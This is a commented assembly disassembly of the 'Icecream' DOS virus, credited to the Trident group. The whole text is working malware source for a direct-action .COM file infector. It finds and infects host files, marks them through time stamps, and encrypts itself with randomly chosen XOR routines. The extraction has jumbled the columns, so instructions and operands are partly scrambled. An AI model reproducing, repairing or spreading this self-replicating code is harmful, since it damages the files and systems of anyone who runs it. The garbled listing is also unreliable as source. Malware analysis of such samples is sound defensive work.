;icecream virus by the trident virus research group. ;this is a simple direct-action com virus that uses one of ;4 encryption algorithms to encrypt itself each time it infects a file. ;it will infect one .com file in the current directory every time it is ;executed. it marks infections with the time stamp. ;disassembly by black wolf .model tiny .code

org

100h

db

0e9h,0ch,0

start: author_name

db

db virus_entry: push call get_offset: pop sub

virus_entry

'john tardy' 0e2h,0fah ax get_offset ax ax,offset get_offset

db lea mov movsw movsb

89h,0c5h si,[bp+storage] di,100h

mov mov int

ah,1ah dx,0f900h 21h

mov

ah,4eh

findfirstnext: lea xor int jnc

dx,[bp+commask] cx,cx 21h infectfile

restore_dta: mov mov int

ah,1ah dx,80h 21h

infectfile:

;jmp

mov pop push retn

bx,offset start ax bx

mov mov

ax,4300h dx,0f91eh

;mov

bp,ax ;restore file

;set dta

;find file

;set dta to default ;return to host

int

21h

;get file attribs

push mov xor int

cx ax,4301h cx,cx 21h

;save 'em

mov int

ax,3d02h 21h

;open file

mov xchg int

bx,5700h ax,bx 21h

;get file time

push push and cmp jne db

cx dx cx,1fh cx,1 continueinfection 0e9h,69h,0

continueinfection: mov lea mov int

ah,3fh dx,[bp+storage] cx,3 21h

;set them to 0

;save it ;check for infection ;jmp

doneinfect

;read in first 3 bytes

mov cmp je cmp je

ax,cs:[storage+bp] ax,4d5ah doneinfect ax,5a4dh doneinfect

pop pop and or push push

dx cx cx,0ffe0h cx,1 cx dx

mov call sub mov

ax,4202h move_fp ax,3 cs:[jumpsize+bp],ax

add mov mov mov mov call

ax,10fh ;save encryption starting word ptr [bp+encptr1+1],ax ;point.... word ptr [bp+encptr2+1],ax word ptr [bp+encptr3+1],ax word ptr [bp+encptr4+1],ax setupencryption ;encrypt virus

mov mov mov int

ah,40h dx,0fa00h cx,1f5h 21h

mov

ax,4200h

;is it an exe? ;other exe signature?

;change stored time values ;to mark infection

;go to the end of the file ;save jump size

;write virus to file

call

move_fp

;go to the beginning of file

mov lea mov int

ah,40h dx,[bp+jumpbytes] cx,3 21h

;write in jump

call jmp

finishfile restore_dta

call mov jmp

finishfile ah,4fh findfirstnext

xor xor int ret

cx,cx dx,dx 21h

pop mov int

si dx cx ax,5701h 21h

;reset file time/date stamp ;(or mark infection)

mov int

ah,3eh 21h

;close new host file

mov pop mov int

ax,4301h cx dx,0fc1eh 21h

;restore old attributes

push retn

si

doneinfect:

move_fp:

finishfile:

message

db

setupencryption: xor xor mov mov push pop push and add mov mov mov mov pop push and shl

db

' i scream, you scream, we both ' 'scream for an ice-cream! ' byte ptr [bp+10dh],2 ax,ax es,ax ax,es:[46ch] ;get random number cs es ax ax,7ffh ax,1e9h word ptr [bp+encsize1+1],ax word ptr [bp+encsize2+1],ax word ptr [bp+encsize3+1],ax word ptr [bp+encsize4+1],ax ax ax ax,3 ax,1

mov mov add mov lea movsw movsw movsw movsw pop stosb movsb mov lea mov mov rep lea mov encryptvirus: lodsb db stosb loop

si,ax ax,[bp+si+encdata1] ax,bp si,ax di,[bp+103h]

;copy encryption algorithm ax dl,al si,[bp+103h] di,0fa00h cx,0ch movsb si,[bp+10fh] cx,1e9h

30h,0d0h

cmp je retn

dl,0 keywaszero

mov mov mov rep mov add mov retn

si,offset authorname di,0fa00h cx,0ah movsb ax,cs:[jumpsize+bp] ax,0ch cs:[jumpsize+bp],ax

db

'[trident]' dw dw dw dw

al,dl

encryptvirus

keywaszero:

encdata1 encdata2 encdata3 encdata4

;xor

;if key is zero, increase ;jump size and place name ;at beginning....

02beh 02c7h 02d0h 02d9h

encryptions: ;-----------------------------------------------------------encptr1: mov si,0 encsize1: mov cx,0 xor byte ptr [si],46h ;-----------------------------------------------------------encptr2: mov di,0 encsize2:

mov cx,0 xor byte ptr [di],47h ;-----------------------------------------------------------encsize3: mov cx,0 encptr3: mov si,0 xor byte ptr [si],46h ;-----------------------------------------------------------encsize4: mov cx,0 encptr4: mov di,0 xor byte ptr [di],47h ;-----------------------------------------------------------authorname

db

'john tardy'

jumpbytes jumpsize

db dw

0e9h 0

commask

db

'*.com',0

storage end

db start

dw

21h

20cdh
